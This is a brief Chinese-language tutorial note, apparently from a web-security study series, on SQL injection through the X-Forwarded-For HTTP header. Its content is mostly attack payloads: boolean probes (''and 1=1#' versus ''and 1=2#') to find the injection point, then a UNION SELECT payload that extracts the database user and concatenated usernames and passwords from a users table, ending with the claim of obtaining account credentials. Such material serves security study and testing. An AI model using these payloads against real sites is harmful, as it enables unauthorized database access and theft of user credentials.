13.xff注入攻击
原理
代码审计
黑盒测试下的xff注入攻击
在报文头部插入
X-Forwardcd-for:127.0.0.1'and 1=1#
插入
X-Forwardcd-for:127.0.0.1'and 1=2#
两次结果不一样,存在注入点
确认注入点
这里有四个注入点
进行联合查询
X-Forwardcd-for:-127.0.0.1'union select 1,2,user(),(select concat(username,password) from users limit 1)#
得到账号密码